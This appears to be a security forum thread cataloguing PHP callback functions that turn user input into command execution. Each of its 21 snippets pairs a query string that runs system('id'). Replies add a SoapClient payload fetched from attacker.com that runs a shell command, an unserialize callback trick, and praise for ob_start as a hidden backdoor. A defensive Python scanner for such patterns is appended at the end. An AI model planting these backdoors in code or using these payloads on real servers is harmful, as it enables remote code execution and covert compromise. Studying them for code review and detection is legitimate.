Server-Side Callback Functions

Discussion in 'Knowledge Base' started by l1ght, 6 Apr 2019.

  1. l1ght

    Current as of PHP 7.3; we will be calling system("id");

    1. array_map
    Code:
    array_map($_GET[x],$_GET);
    ?x=system&_=id
    2. array_walk, array_filter, array_walk_recursive
    Code:
    array_walk($_GET,$_GET[x]);
    ?x=system&_=id
    3. array_udiff
    Code:
    array_udiff($_GET,$_GET,$_GET[x]);
    ?x=system&_=id&1
    4. array_reduce
    Code:
    array_reduce([1],$_GET[x],$_GET[_]);
    ?x=system&_=id
    5. array_udiff_assoc, array_uintersect, array_uintersect_assoc
    Code:
    array_udiff_assoc($_GET,$_GET,$_GET[x]);
    ?x=system&_=id
    6. array_intersect_uassoc, array_diff_ukey, array_diff_uassoc
    Code:
    array_intersect_uassoc($_GET,$_GET,$_GET[x]);
    ?x=system&id=1
    7. array_uintersect_uassoc, array_udiff_uassoc
    Code:
    array_uintersect_uassoc($_GET, $_GET, $_GET[x],_);
    ?x=system&_=id
    8. usort, uasort, ArrayObject::uasort
    Code:
    usort($_GET,$_GET[x]);
    ?x=system&_=id&1
    9. uksort, ArrayObject::uksort
    Code:
    uksort($_GET,$_GET[x]);
    ?x=system&id=1&1
    10. call_user_func
    Code:
    call_user_func($_GET[x], $_GET[_]);
    ?x=system&_=id
    11. call_user_func_array
    Code:
    call_user_func_array($_GET[x], $_GET);
    ?_=id&x=system
    12. iterator_apply
    Code:
    iterator_apply(new ArrayObject([1]),$_GET[w],$_GET);
    ?_=id&w=system
    13. register_tick_function
    Code:
    declare(ticks=1);
    register_tick_function($_GET[x],$_GET[_]);
    ?x=system&_=id
    14. forward_static_call
    Code:
    class A
    {
        function __construct() {
            forward_static_call($_GET[x],$_GET[_]);
        }
    }
    new A;
    ?x=system&_=id
    15. forward_static_call_array
    Code:
    class A
    {
        function __construct() {
            forward_static_call_array($_GET[x],$_GET);
        }
    }
    new A;
    ?_=id&x=system
    16. session_set_save_handler
    Code:
    session_set_save_handler($_GET[x],_,_,_,_,_);
    ini_set('session.save_path',$_GET[_]);
    session_start();
    ?x=system&_=id
    17. sqlite::createFunction
    Code:
    $x=$_GET[x];
    $db = new SQLite3(':memory:');
    $db->createFunction($x,$x);
    $db->querySingle("select $x('$_GET[_]')");
    ?x=system&_=id
    18. spl_autoload_register
    Code:
    spl_autoload_register($_GET[x]);
    new $_GET[_];
    ?x=system&_=id
    19. ob_start
    Code:
    ob_start($_GET[x]);
    echo $_GET[_];
    ?>
    ?x=system&_=id
    20. set_exception_handler
    Code:
    set_exception_handler($_GET[x]);
    throw new Exception(";$_GET[_];#");
    ?_=id&x=system
    21. register_shutdown_function
    Code:
    register_shutdown_function($_GET[x],$_GET[_]);
    ?x=system&_=id
     
    =HALK=, MichelleBoxing, t0ma5 and 5 others like this.
  2. Gorbachev

    Like.
    Of all those listed, the most interesting is the one with ob_start; it's a good way to hide an inconspicuous backdoor in a large chunk of code.
     
  3. crlf

    A little madness for the thread :)
    PHP:
    <?php
    $client = new SoapClient(null, array(
        'location' => 'http://attacker.com/evil.xml',
        'typemap'  => [['type_ns' => 'http://windows.must.die', 'type_name' => 'bad', 'from_xml' => 'system']],
        'uri'      => 'http://localhost/'));

    $client->x();

    http://attacker.com/evil.xml:
    PHP:
    <?xml version="1.0" encoding="utf-8"?>
    <env:Envelope xmlns:env="http://schemas.xmlsoap.org/soap/envelope/"
      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xmlns:xsd="http://www.w3.org/2001/XMLSchema"
      xmlns:enc="http://schemas.xmlsoap.org/soap/encoding/"
      xmlns:ns1="http://windows.must.die"
    >
    <env:Body>
      <ns1:drugs>
        <bad xsi:type="ns1:bad">x;
    touch /tmp/pwned;
        </bad>
      </ns1:drugs>
    </env:Body>
    <env:Header/>
    </env:Envelope>
     
    =HALK=, BabaDook and l1ght like this.
  4. b3

    Of all those listed, ob_start is precisely the one that can cause problems; you need to check whether other buffer caching mechanisms are in use and not forget about ob_end_flush()
     
  5. l1ght

    unserialize_callback_func
    Code:
    $c='O:2:"id":0:{}';
    ini_set('unserialize_callback_func', 'system');
    unserialize($c);
     
    dooble likes this.
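
For reviewing a code base for the constructs listed in this thread, here is an added example (not part of any post above): a small Python triage scanner that flags calls to those callback-taking functions only when the callback argument itself is derived from request data. The names `find_request_callbacks` and `split_args`, the one-pass taint heuristic and the PHP sample are assumptions of this example.

```python
import re
# Callback argument index (0-based, negative = from the end) for the functions in the thread.
SPEC = {
    (0,): "array_map call_user_func call_user_func_array register_tick_function "
          "forward_static_call forward_static_call_array spl_autoload_register "
          "ob_start set_exception_handler register_shutdown_function",
    (1,): "array_walk array_filter array_walk_recursive array_reduce usort uasort "
          "uksort iterator_apply createFunction",
    (-1,): "array_udiff array_udiff_assoc array_uintersect array_uintersect_assoc "
           "array_intersect_uassoc array_diff_ukey array_diff_uassoc",
    (-1, -2): "array_uintersect_uassoc array_udiff_uassoc",
    tuple(range(6)): "session_set_save_handler",
}
CALLBACK_ARG = {name: idx for idx, names in SPEC.items() for name in names.split()}
REQUEST = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
ASSIGN = re.compile(r"(\$[A-Za-z_]\w*)\s*=(?![=>])\s*([^;]*);")
CALL = re.compile(r"(?<![\w$])(" + "|".join(CALLBACK_ARG) + r")\s*\(")

def split_args(src, open_idx):
    """Split a call's arguments at top-level commas (string literals are not parsed)."""
    args, depth, start = [], 0, open_idx + 1
    for i in range(open_idx, len(src)):
        depth += (src[i] in "([") - (src[i] in ")]")
        if depth == 0 or (depth == 1 and src[i] == ","):
            args.append(src[start:i].strip())
            start = i + 1
        if depth == 0:
            break
    return args

def find_request_callbacks(src):
    """Return (line, function) for calls whose callback argument is request-derived."""
    tainted = set()
    def dirty(expr):
        return bool(REQUEST.search(expr)) or any(
            re.search(re.escape(v) + r"\b", expr) for v in tainted)
    for var, rhs in ASSIGN.findall(src):  # in-order propagation: $f = $_COOKIE[...];
        if dirty(rhs):
            tainted.add(var)
    hits = []
    for m in CALL.finditer(src):
        args = split_args(src, m.end() - 1)
        if any(-len(args) <= i < len(args) and dirty(args[i]) for i in CALLBACK_ARG[m.group(1)]):
            hits.append((src.count("\n", 0, m.start()) + 1, m.group(1)))
    return hits

# Constructed PHP sample: one literal callback, two request-derived ones.
SAMPLE = ("<?php\n$names = array_map('trim', $_POST['names']);\n"
          "ob_start($_GET['fmt']);\n$f = $_COOKIE['f'];\n$db->createFunction('norm', $f);\n")
```

This is a regex heuristic, not a PHP parser: method forms such as ArrayObject::uasort (callback in the first position) and settings such as unserialize_callback_func need their own rules.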